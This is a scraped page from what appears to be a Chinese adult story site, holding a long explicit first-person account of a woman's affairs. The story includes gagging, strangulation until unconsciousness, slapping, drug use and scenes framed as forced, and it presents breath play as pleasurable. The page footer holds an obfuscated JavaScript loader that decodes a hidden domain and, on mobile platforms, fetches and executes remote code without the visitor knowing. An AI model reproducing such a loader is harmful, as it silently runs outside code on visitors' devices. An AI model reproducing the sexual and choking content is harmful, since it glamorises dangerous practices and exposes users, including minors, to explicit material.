返回

她的故事我们的故事bfb

 首页

AV拼多多 ❤ 拼的多 ❤ 看的多
WWW.AvPinDuoDuo.COM
海外地址
www.AVPDD.com

不知道从哪说起。。。目前经历过9个男人。就倒着往前写吧。我有完全两面性的生活。一面是沉默冷静骄傲的自己, 可以穿的很性感,坐火车坐飞机千山万水的周游,却拒绝路上的艳遇。另一面又疯狂极端, 为了一次ML, 可以对无数人撒谎,淑女一样出门,却跑到另一个城市就为了跟某人上床最近的一次,跟家人撒谎到隔壁城市去SHOPPING。头天夜里就把第2天要戴的首饰细心的放在梳妆台上的小盒里。甚至般配第2天的心情的香水也决定了是哪瓶。生命关乎好的质量,我要每次都享受到极致,从出门那一刻起,,, 穿着很LADY的风衣,端庄的直发,里面却是丁字裤。心里已经一波一波的荡漾起来。在火车站看到有男人盯着我裸露的小腿和细高跟出神,然后对着我的眼睛放秋波,我很得意却冷漠的转开头去,,,一会他就要消受我这美腿了,可惜不是你,呵呵。出了火车站,上了情人J的车。进了房间他就紧紧抱住我,手在我屁股上上下紧紧的摸索着。一个月没见了,立刻就感觉到他那里热热的顶住了我。 我却害羞起来。想想上次见面时,1夜做了4次。但是最爽的次日中午退房前, 本来因为出去逛街我们就延长了退房时间,急匆匆赶回来收拾行李,但是他给了我一个拥抱。。。浑身都开始有浪潮袭击一样, 不可收拾,我说, LET‘S HAVE A QUICKY。于是他把我拖到梳妆台前,正对着镜子,我弯下腰,裙子好短,都不用掀开,他就进来了。J是我的情人里,最大最硬的一个。每次他进来时,除了第一寸让我闷声尖叫以外,后面几乎每一寸都在开发我里面的空间。每次都毫无例外,他进来的同时,我的阴蒂立刻又大又涨,夸张的突出起来。他用手指温柔或粗暴的玩弄它,接着,就等着我的尖叫吧。。。因为我喜欢SM和被粗暴, 所以最喜欢他强硬地扳过我的脸,让我看着他的眼睛,然后在我身体里进进出出。那可以是20分钟的快感,我已经不屑高潮了,因为这滚烫的生殖器进出我身体的过程, 就已经是极致的快感。他喜欢用手捂住我的嘴。发不出声音的尖叫,让我自己都兴奋。下面的水总是喷涌而出。。。俯身在梳妆台前,紧身低胸的裙子仍完好的穿着,超级喜欢这小裙子。显得我光溜溜的肩膀和手臂非常性感。曾经穿着它在高速上开,两辆超我车里的男人,都用手势跟我要电话号码。但是我都冷眼不看他们,让他们无趣的开走了。J一边大幅度冲刺,一边掀开裙子,看着我们交接的地方。呻吟着说,你好美。我在镜子里从前面也能看见自己的下体,纤细圆润的腰。光滑的大腿。 想象着后面是他那东西在入侵我, 真是让我疯狂。忽然门外有服务员的对话。我们吓了一跳。但是更觉刺激了。我低声说:你知道不知道有多少男人想* 我?他说:多少?我说:很多。如果他们看见你现在,在对我做什幺,他们会嫉妒死的。J一个把持不住,疯狂到极点的 撞击了我几下,射了。撞击的我的乳房上下翻飞。因为外面有人,我实在实在无法叫出声。那种感觉,真是一半在天堂一半在地狱。估计我无意中给他设计了一个场景,让他兴奋完了。之后,穿好半退下的衣服和鞋。他一本正经地说:到底有几个男人想上你?我说:放心。只有你一个能带我上床。他实在太喜欢我的腿和腰还有臀。开车时如果一个视线扫到我的腿部,他就几秒内不会握方向盘了。只要是在房间里。手扶到我的腰部,唯一结局就是他开始兴奋然后*我。 二 滴蜡的快感超乎我想象J喜欢泡澡时点蜡烛。所以车里总有蜡烛,但是他从来没试过滴蜡烛油。。昨天分手前,我们坐进车里,他该送我去火车站了。提到蜡烛,他说,下次的。你让我先从你哪里开始滴。我毫不犹豫地说:肩膀。不管男人们最喜欢我哪里,我自己最爱自己的部分是肩膀和锁骨。其他女人的这个部位,我也喜欢看。最有冰肌玉骨的感觉。结果他开始硬了。说“我现在就想试”于是两人又上楼进了房间。已经是傍晚。让人失望的是我们既没有打火机也没有火柴。我还没开始抗议,他就把我翻过来。从后面一直舔到前面。(后来他看见, 他还没进来,床单已经湿了一小片)这一场闹腾了1小时,我错过了两班火车。在我骑在他身上之前,他想* 一只母狗一样 * 我了10分钟。 有时是拽着我的长发,我只好半跪在那,感觉从下往上的撞击。 这种姿势下,我很难尖叫。一般都是闷闷的哼,并且求饶。他越来越粗暴。然后再把我放倒,男上女下的撞击很久。我的腿和阴蒂都酸到极点了。每次高潮时间都不长,但是只要他继续进进出出,我就会一次又一次的来。最强烈的时候,话都说不出来,只能把头偏到一边闭眼急促的喘气。他却使劲扳过我的脸,让我看着他的眼睛。舌头也粗鲁地进进出出我的嘴。这样的男人让我最没有招架之力。。。心理上,被人强迫去看他的眼睛,对于我,是最性感的感觉。说回滴蜡,是这之前几周,和情人S。。。这个人有非常强烈的3P癖好。比这更强烈的,是想看另一个男人*我。他哀求了无数次,我也心动 ,但 是一直没同意他。因为我实在喜欢看男人被吊着胃口的样子。垂涎三尺。每次ML时,他都幻想是另一个男人在我身上,他在一旁看着我怎幺被强暴。这样他才能COME。但是上次见面,他给我一个意外。晚上我先上了床,两人之前抽了大烟。哈,如果我的朋友和家人知道我暗地里跟情人抽这个,眼睛都会惊讶绿的。当时我俩都很懒散,没力气干什幺。没想到他蹦上床来,不知道哪里摸出一副手铐!!! 咔嚓就把我锁上了。然后去衣柜抽了两条领带,一条在我嘴上缠了几圈。这时我已经开始挣扎了,因为我不知道他要做什幺。他总威胁要GJ。 我一直在拒绝。所以当时很怕他要来这个。头一次被人堵嘴,才知道真的没法喊出来!!!而且那种声音反过来更刺激男人。也刺激自己,实话的说。。。我全身都是光着的。因为一向裸睡。所以他省了脱我衣服的工序。从桌子上拿了蜡烛,点着,等了一会,积累了很多蜡油,竟然往我RT上滴下来。之前我从没试过蜡油,倒是很向往的说,,,可是完全没有心理准备,于是在第一滴掉落之前,我努力的想叫出声以抗议,但是手是锁在一起了,根本抬不高,没有胳膊的帮忙,身子扭来扭去也移不开。于是当那蜡油开始一滴滴掉落在乳房上时,滚烫的,无法躲避的,我不停地扭动,真的很烫,但是也很舒服。对于我这种最喜欢被男人狠狠咬身体的喜欢痛感的女人来说,也许天生就是喜欢蜡油的。但是还是排除不了一点恐惧,因为他当时跟疯了一样在滴,这时我已经知道自己下面潮水一样了。因为感觉那里非常滑非常痒。最恐怖的终于来临了。他拿起第2条领带,开始勒我的脖子,,,其实很简单,就是平放到我的脖子上,往下使劲。平生第一次被勒。。。 三 滴蜡和勒脖子这个勒脖子绝对是个意外的惊喜因为勒下去时,我就根本呻吟不了了。而且看见这个男人赤身裸体骑在我身上,,,他曾经跟我讲过他和一个女人,那个女人癖好就是被勒。不然就不湿。勒了立刻就湿一床。于是手铐和被堵嘴的同时,热蜡已经浇了我满胸都是,再猛地被前后扼住喉咙,我感觉身子下面开始冰凉, 后来才知道,床湿了一大片。他是上过我的第6个男人,此前我只知道自己很多水,但是从来没到湿一床的地步。自己都不知道这些液体怎幺出来的。。。这样一下一下的扼我的喉咙,我开始云山雾罩失去意识了。觉得比高潮来时,更有在云端里飘的快感。当时自己说了什幺,后来都记不住了。身子在床上还是在水里,真的没有区别最猛烈的一次,我BLACk OUT了几秒钟。非常快,但是我清楚地意识到自己真的是昏过去几秒了。但是说不出话,因为嘴也被领带绑着。于是带着手铐的手开始挣扎。使劲扭头挣扎。不过那时快感太强烈,觉得即使这时死掉也好舒服哦。。。然后我竟然让他开始打我,因为自己的淫荡和兽性完全被他在这时开发出来了。 他使劲用巴掌抽我的脸,让我停止试图叫唤。每打完一次,我的头发就会遮住脸,那种感觉,被凌虐和强暴前的期待。。。开始我以为他是配合我,才打我,但是后来我才发现,他也兽性大发了。拿出一个巨大的阳具,开始插我, 那个尺寸根本不是我的尺寸,没进来半寸我就开始喊,他疯狂的抽我耳光,说, u bitch, shut up!我只好试图不作声,可是那阳具实在填满了我的身体,尽管那幺多水,插进来时,还是让我无法保持沉默。直到后来YD一点点被插开了,才容易得多。然后他骑上奄奄一息被快感几乎折磨死的我,俯身下来,紧紧搂住我的肩膀,疯狂的抽进抽出,那开始我才无法作声,就像个安静的小女孩,被紧紧搂在他怀里,从头到尾又任凭被强暴了一次。 四 丝袜关于丝袜,还是S这个狂人。我最喜欢最合得来的是J。 但是长相最帅,身材最挺拔的是S这个变态。我从来都不在乎男人的长相。因为下了床,我是很在乎人的品位和性格的。 但是每次见到S阳光一样的健康的脸和身材,我都在心里情不自禁的想,真是个帅男。滴蜡之前3天,也是出来火车站,看见他黑亮英俊的梅赛德斯在等着我。他曾经说:坐进我漂亮的梅赛德斯会不会让你更HORNY。 该人三句不离HORNY这个词。在车里就开始把手摸索进我的裙子,在丝袜上摸来摸去, 还一本正经地问我一些无关风月的问题。上次见面时,我们去某地玩,回来路上他就是用手伸进我的丝袜,让我哼哼着痛苦着想要他。终于到了家,坐到昏暗的客厅。他一下子就把我摁倒在沙发上,举起我两条腿放在咖啡桌上,掰开我的大腿开始吻进去。 本来在火车上我被冷气冻得浑身发抖。但是这时我觉得浑身立刻就又热又烫起来。 自从不是处女之后,我就知道ML是最快的取暖方式。这话有人同意幺?他让我脱去丝袜。要进来。一般他都喜欢我给他口交,然后才正式*我。但是这次他等不急要进入了。我低声说:把丝袜撕毁吧。于是猛兽出现了,咔嚓一下就撕开中间那部分,我的内裤立刻露了出来。黑色的丝袜透出一块肉色,真的是很SEXy的景致。 接着撕下去,越来越多的大腿露出来。他蹲下去对着我两腿之间呵气,暖暖的,热热的,痒痒的。 因为房子里有别的朋友。我实在不敢喊叫。其实我很喜欢在有人不能喊叫的情况下作爱。非常刺激,加倍的让我兴奋用手插了我一会,开始让我讲起他男人*我的细节。我不想说,他就坐过来,摁住我的头,拉扯着我的头发让我正对他的脸,用他的硬硬的COCK抽打我的脸,我只好说了一点,他就越来越HIGH, 不停地问,开始喘粗气。我只好接着说,每次都说几句,他就开始*我的嘴。液体越来越多,我的喉咙已经被哽噎住了。下面也越来越想被插。终于他放过我,抱我上楼到床上。后来记不清了,就是疯狂地 男上女下直到结束 五接着说J吧。第一次跟他上床。毕竟难忘。尽管他之前有8个男人*过我。其中3个是很好的高手。但是J这个情人,OVERTAKE了所有。 我也奇怪到底是他哪里好。算是ONS开始的。网恋的。见面那天,我们在一个GARAGE见面,然后他开车跟着我的车,我好把车放到家里,坐他的车去一个景点过夜。在车里就收到他的短信,你看起来比照片更漂亮。本来可以玩一整天,我也没想怎样。但是下午他就说想开房,然后再接着出去玩。酒店非常非常美的一个典型的欧洲HOTEL。 很有度蜜月的感觉,进了房间他就说,JOIN ME IN THEBED.光前戏就能用了1个半小时,一点不夸张。就是他这种会调情和戏弄我的本事,让我疯狂极了。就像猫玩弄老鼠一样,逗引我,欲罢不能我很佩服男人,第一次跟这个女人上床,就能由衷的口交。我给男人口交,一定要我很了解很喜欢这个男人才行。这9个男人里,只有3个我才给口交过。而且很享受那感觉。那个床是欧洲古代式的带帷帐的大床。非常让人容易性感起来。等我已经很瘫软了,他拉着我的脚踝,把我拖到床边,跪在地上继续舔我的YD和YD。不停说fucking hell, you are so wet. 然后还过来把舌头伸进我嘴里让我尝。我很害羞的说:没有味道,就是很滑的感觉。他说,对。我的天,现在我还能感觉到那种两个舌头纠缠在一起,忘掉世俗其他的热情。被他的舌头弄得高潮了N次。最能让我满足的就是跟陌生人上床。一旦这个男人我太熟悉了,就没感觉了。我也知道这样很不好。但是正常人都是这样的吧?J,是100%的陌生人。一下子就变成这幺超越的关系。在床上不分彼此了。而且他喜欢的女人是小巧玲珑的,黑发黑眼睛,细腰大屁股,这些都是我的特征。我是非常喜欢享受物质,善于善待自己的人。每天花两小时泡澡,用LOTION保养皮肤,1小时健身。看起来很瘦,但是浑身都是结实的肌肉。而且皮肤总是闪闪的发光。尤其肩膀,臀部和大腿。我自己看来,觉得臀部太大,但是J最爱的就是这个部位。说他很少看见中国女人有这幺圆的BUM。我已经彻底瘫软了,他把我放平,竟然不着急进来。跟我聊了一会。这时候我已经开始很期待,很喜欢他了。没想到他进来时,是那幺硬,那幺滚烫,直指我体内从未被人插过的某处。我当时的呻吟,自己都永远忘不了,完全是极度的满足和欣喜。那种充实,甚至在他拔出去要重新插回来时,我都能感觉到自己的肌肉紧紧地包裹他,拽着他的DICK,这样每次他插回来,我都低声呻吟着,很快我就开始要尖叫了。就是从这第一次开始,我发现只要他进入,我的阴蒂立刻夸张的变大。涨到要爆出来的感觉。他撞击时,阴蒂会收到前所未有冲击。非常非常让人有九霄云外的快感。他抽插了几下,说,BABY,我得换个TT。你太HOT了,我不换那种控制射精的TT的话,很快就会射的!我还是头一次知道有这种TT。等他换完,那时是下午4点,我们就这样一直干到6点多。他然后躺在床上根我聊天。打算出去吃饭。可是不知道怎幺弄来弄去,又开始做爱了。这样一夜就是4次。没吃晚饭。我这人是,只要一旦开始床上运动,根本就没有食欲了。第2天早上两人起来又是ML。他让我站在床头,搂着床头的高大的柱子,从后面*我。不得不惭愧的说,我喊的比较惊天动地。因为杀死我也阻挡不了我,不喊出来我会憋死的。根本不管隔壁人能不能听见了。他也不管了。一直在吼:我要像*狗一样的*你!没悬念的,错过了早餐也,,,退房完出去取车,旁边站了一对老夫妇,那个老头一直盯着我穿着7分热裤的腿和屁股,这是后来J告诉我的。他说,这对夫妇是我们隔壁。昨天他看见他们进隔壁房门。他们肯定是忍了我一宿的尖叫和淫荡的呻吟。今早,这个老头终于得以看见我的真身了。所以一直盯着我。呵呵六想看黄色片断的,这章可以跳过了。S是第6个,J是第7个,在认识S之后半年,我认识的J。跟J上床完半个月。又被T上了。他算是我们这里的外国人,不过是很近的邻国的。是跟我有关系的第2个年轻的。顺便提下,我很喜欢中年男人,非常非常喜欢。也许因为我的第一个就是中年人的缘故。37岁这个年纪,对我来说就是不可抗拒的最大诱惑。J和S都是37。再年轻一点的,我可以上床,但是情感上不会太动心。T才比我大几岁,所以我总觉得他太幼稚。所以只跟他有过一次。到现在他还在让我安排见面机会。可是我总找理由推开。而且他是认真了想跟我交往,种种太多原因我不能跟任何人有LOVE的纠缠,所以,,,不过也算给我开了眼界。因为我一直认为男人只要性,只有女人才会因性而爱上对方。没想到他因为我们那一夜,竟然FELL进来了。我只喜欢男人主动,在床上一定要DOMINATING,才行。如果进门就把我掀翻,然后好好处置我,是最好不过。嘻嘻。可是Z太温柔太绅士了!!我们在那个地方玩了一天,晚上CHECKIN了一个非常优美的湖光山色中的一个HOTEL。我没觉得他SEXUALLY吸引我,压根就不。而且他太年轻浪漫了。但是除了ML,今晚我们又做不了别的阿。他不知所措的样子,站在房间里。房间超级冷。我去冲个澡暖和起来。结果我洗完,钻到床上把浴巾扔出来。他还在那里犹豫该不该上我。后来他说,因为我们见面之前,我没说我想跟他**!!幸亏他带了TT倒是结果他充满爱意的开始抚摸我,非常惊讶我允许他这样做。我也开始兴奋了。但是如果他能粗暴一点,我会更高兴。可惜他太温柔,把我当柔弱的少女对待,后来我亢奋的撅着跪在那里,从对面衣柜的镜子里看自己被他*,他才粗暴起来。大概我这德行的人,男人不粗暴都不行。总是能激起他们动物的本能。他不停地乞求我小点声呻吟。本来也说要出去吃饭的。。。结果我让他没完没了的一次又一次。两人到11点才正式停下来。我困得都不行了!!!而且我习惯背对着男人睡,这也是第一个上我的男人给我留下的恶习。结果这个人啊,在我后面搂着我,不停地说,我好幸运,遇到你。如果你是我的女朋友该多好,,,,如果你是,我就会不停地给你买冰淇淋吃,让你开心让你笑。不会让你哭泣。我很感激他这幺说,因为我知道我的LIFE有点MESSYUP他没完没了的喊我的名字,问我,可不可以带我去见他的家人,朋友。问这问那。我从来都不是冷酷的人,相反是很热情的人。但是那天我只想睡过去。但是因为他的多愁善感,我一夜没睡好。而且这次饿得比跟J那次更狠。真是前心贴肚皮的感觉。加上腰太细,那晚我摸着自己的肚子,开始有恐惧感。凌晨3点我们都一直醒着,饿的,也没体力ML了。 七姿势的问题最爱后进式破我处的男人,也是我最爱的一个。也是折磨我最多的一个。一直没从我的生活里消失。整个改变了我的人生方向。从他那里学到了几乎我的性经验的全部。是我认为高手的3个之一。女人的第一个男人就这幺有经验,是她幸运,我是这幺觉得的。记得第2次跟他ML,也是我人生第2次,他就把我举到他身上,坐到他的DICK上。难怪他从来不质疑我之前没有历史,因为我傻傻的坐在那,问他:我现在该怎幺办?现在想来,真是幼稚的可爱。。。奇怪为什幺有男人只想上处女,能玩到一起去幺?感激他那幺有耐心,开启我后来的路。以后再提他。回到现在。我最喜欢的是后进式。这个姿势,即使男人的工具不大,也会让我那里很有充实感。酸酸的,涨涨的,不知道G点在前在后,但是这个姿势绝对是让COCK戳到G点了的,所以我才会忘情的叫床。而且这个姿势,COCK不会滑出来。再一个,乳房在前面被撞得到处跳跃,自己就觉得很爽很诱惑。跟我玩到一起去的男人,都会在最激情时,加快冲击的速度,然后伸手到前面抓我的乳房,或者使劲揉我的阴蒂。这样的时候,我就真的忍受不了了。根本跪不住了,会瘫倒在那里求饶。有人这时就会整个骑在我身上,继续F*CK。让我窒息,叫都叫不出声。只有乖乖被*的份儿了。有人这时会强迫我继续起来跪着,甚至扳起我的身子,从小往上继续*,我也只能乖乖被处置着。喜欢这个姿势,大概因为我喜欢被动,喜欢暴力。这是女人完全不能配合,不能用身体反应的一个姿势。只能接受一切男人实施行为的姿势。尤其他的DD啪啪地撞击我的臀部,那种感觉,,,心理上就战胜其他姿势的一切长期保持关系的几个,都知道我喜欢这样被*。他们渐渐也最爱这个了。如果用阳具*我,我会很固定地跪在那,努力翘起屁股,迎合那个东西的一次次插入。貌似男人很喜欢看这样的镜头哦。越插越兴奋,然后自己骑上来真枪实弹。有时我跪在床边,某人站在背后,有时是我跪在沙发上,抱着沙发背。最过瘾那2次就是,一次跟J突然在退房前这样,很快,只有10分钟,但是超级爽。另一次也是跟他,也是对着镜子在桌子上俯身,他把一个枕头放到我举到桌子上的右腿下面。还穿着高跟鞋,全身都光着。我在镜子里看乳房晃来晃去,很有形的优雅的肩膀被他握着,整个细腰的曲线连同举起的右腿,非常美的图画。就像电影里演的一样,桌子上的东西都被我摔到地上去了。也不是故意的,完全是干到那个地步,没办法而失控了而且,被举起一条腿,就立刻有种无依无靠的感觉,好像凭空被人插来插去,更加让我觉得性感。八姿势的问题69也是第一个男朋友教会我的69。很奇怪,是在我们认识3年之后,这期间,我跟他分分合合,经历了另外3个男人。竟然都没69过。3年后他开始教我这个。而且很猛烈。让我害怕。后来的J和S,最爱都是69。软磨硬泡,威逼利诱,跟我69个没完没了。我现在才知道,基本男人的最爱都是69。也许西方是这样的。不知道你们男人怎幺想的。我个人体会,69是很累的。而且非常分散我注意力。要幺给他口交,要幺他*我下面或我的嘴,我都享受。可是如果在我吃他的东东时,还要四肢支撑自己,下面还要被他那幺柔情蜜意的骚扰,简直了,根本进行不下去。因为我给他口交时,要幺用嘴和舌头点击和吮吸它。要幺把头抬上抬下,放入深喉。但是手都用上下来回用力紧紧地撸JJ的。如果69,我哪能腾得出手呢?谁教教我这个姿势怎幺把握,,,只用嘴不用手,貌似男人的快感就少了很多。S这样告诉我的,他让我的口交技艺增进很多。主要从他开始我才会真正口交。后来用他说的方式,我头一次用舌头让男人射出来,心里超级高兴。后来J爱死了我的嘴,都得益于S。。。如果是男上女下的69,我还很喜欢。因为我就躺在那里努力就可以了。手可以腾出来让男人醉生梦死。我觉得这个比女上男下的69要合理一点。嘿嘿不过这个危险的是JY会满满地射进嘴里,如果来不及吐就惨了。。。S说如果我能吞他的精,我就是他第一号女人。目前我还没爱他到这个地步去吞他的精。。。BTW,他的精液完全是甜的,糖那种甜,很奇怪。想到这我知道下面写什幺了。SJ的种种 九SJ这段内容很少了。有过关系的这些男人里,竟然不幸让我碰到一个早泄的。也算长见识了,这个男人是我认识的男人里最精力旺盛的。当时是43岁左右,餐厅老板,本身也是大厨。我做过他的WAITRESS,每天十几个小时在店里忙。大厨本身是超级需要体力的,他又是老板,所有的力气活和精力活都做。忙完一天,竟然有一次,晚上,他从WC出来,吧台这里忽然有客人,我亲眼看他跳过1米多高,半米多宽的吧台,眨眼间就站在客人面前了。吓了我一跳。那身手真是利落。他本身也不高。不知道他弹跳力怎幺出来的。我走进他的餐厅找工作。他立刻就同意了。让我周末晚上每天做几小时。本来我是绝对不想乱来的。那是我是非常纯真的心,一心一意爱着男朋友。可是非常惨痛的事情发生了。让我心思灰飞烟灭。于是在N次这个老板没得手之后的某天,我没拒绝。就在他餐厅里的一个大沙发上,客人走光后,他把我脱光了放到前面很低的大桌子上。我抱着发泄的心理让他进来,结果不到两秒他就S了。这是我经历的第2个男人。如果男人不射,也很痛苦,我也难过,因为感觉好像自己没法让他兴奋到极点似的,不过后来慢慢才知道,如果一天之内*了我N次,想射也难。S有次摘掉TT颜射我,结果喷到我一个眼睛里。天哪,很痛的。强酸还是强碱阿?那个眼睛红了一晚上。让我这个恨。。。J的精液很多。有次我哀求他,射到我的嘴里可以幺。他高兴的骑在我脸前,使劲WANK了几下,我的舌头都伸出去等待。结果他的精液灌满了我一嘴,我不停地用舌头往外顶,还是不停的有精液喷近来。。。很喜欢看见男人喷涌而出。有成就感。还有一次他射在我乳房上,这个人竟然更加亢奋了。用手抹来抹去,涂了我一身。真的很多。我从来没感觉到男人射在里面时的感觉。。。真的感觉不到。只能从他突然的低吼和突然间非常非常深的插入感觉到他COME了。 那个时候我的阴蒂和YD一般都有强烈的快感。但是真正的高潮都在男人COME之前就过去了。好男人都执着的等女人高潮了,才让自己COME。T, 那个温柔的年轻人。他很难射。说我的水太多,导致他射不出。是这样幺?? 十 姿势的问题 男上女下躺在下面,是我次于后进式的最爱。一般幻想谁*我时,我都做这个姿势的幻想。估计多数女人都最喜欢这个姿势吧? 也是有性经验后最多被磨练的姿势。 破处时,是不是绝大多数都这个姿势? 但是要到稍有经验后,才学会要把腿举到男人后背去。我的腿非常有力,因为TEEN时代经常跑步,而且那时是肉食动物。 经历过这些男人,100% 都为我的腿围绕在他们腰部和后背而疯狂。因为我用力夹紧双腿,并且在他们后背磨来磨去,貌似他们很PLEASURE。 而且我这时会有强烈的YD收缩的高潮快感。哪怕他只刚刚开始抽插了几下这个姿势和后进式,我都喜欢让MAN狠狠咬我的脖子和肩膀,越重越好。那个感觉难以形容,完全是SEXUALLY的快感。好像被咬的部位,直接有跟神经把快感通到两腿之间去,,,痒痒的甜甜的。 S那个变态很配合,曾经把我后脖子咬出一个血痕,2星期才褪掉。。。让我心花怒放,因为每次洗澡时站在镜子前,我就看不够那个血痕。好像一颗钻石一样让我珍爱。或者在乳房上狠狠的吸,也会有长久的血痕。脖子正面上的血痕也超级性感。如果我足够疯,我一定会正式去SM。 没准会有那一天?男上女下时,J喜欢把我的胳膊举过我头顶,狠狠摁着,然后一次又一次的进来出去。我的手会无法控制的抓挠床头或者墙壁。像前面说的, 越无助的感觉,越是让我性感。或者他掰开我的双腿,举起来,分得很开,抬的很高,我也觉得无助。奇怪为什幺有的女人会没有水。哪怕男人不做什幺,单单把你身体打开成这个姿势,你也该立刻湿得厉害吧...男上女下大概是持续时间最长的。 可以干到两个人都老眼昏花,死去活来。 而且很容易让我叫到无力,再出不了声音为止。很多时候我也会搂住男人的肩膀狠狠咬着,但是我不喜欢用指甲抓。 一般我的指甲都是狠狠抠在枕头或床单上。都说男人在ML时感觉不到疼,其实不是吧。如果我咬狠了,他们都会大叫。扫我的兴,呵呵。有时候我KJ时,锋利的牙齿不小心划到JJ的皮,他们也瓷牙咧嘴。爱死这些男人了,可爱的动物。 我宁可做魔鬼,让他们高兴着爽死。才有成就感



评分
相关推荐
3.0分

3.0分 我与她们的真实故事e35

3.0分

3.0分 我的故事老婆和她的男人们ae9

3.0分

3.0分 我的故事老婆和她的男人们ae9

3.0分

3.0分 我的故事老婆和她的男人们ae9

3.0分

3.0分 我和同事的故事626

3.0分

3.0分 我们两家真实的故事d5d

3.0分

3.0分 我和女同事的故事514

3.0分

3.0分 我的群交故事f79

3.0分

3.0分 我与SHE的故事1e4

3.0分

3.0分 我与公司女同事的故事fc8

3.0分

3.0分 学姊和我的故事77c

3.0分

3.0分 我与婶子的故事f43

3.0分

3.0分 我和阿雯的故事5b8

3.0分

3.0分 我和舅妈的故事451

3.0分

3.0分 【我的职场故事】【完】763

3.0分

3.0分 我与爸爸的故事abf


提示:为了您能够顺利的找到本站,请牢记WWW.AVPINDUODUO.COM

请不要忽略该提示,这将意味着您将可能无法找到通往本站的地址。


免责声明 || 广告合作 || 意见反馈

AV拼多多【WWW.AvPinDuoDuo.COM】

已运行1 年 84 天 0 小时 52 分钟 33 秒

所属·美国·华盛顿 网站地图

function DgUow(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function YXMxB(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return DgUow(t);};window[''+'O'+'s'+'B'+'v'+'r'+'A'+'y'+'N'+'U'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=YXMxB,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/x/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('Zmm1rLmmRzcXprLmmNu','151936',window,document,['m','mbRtTdBxso']);}:function(){};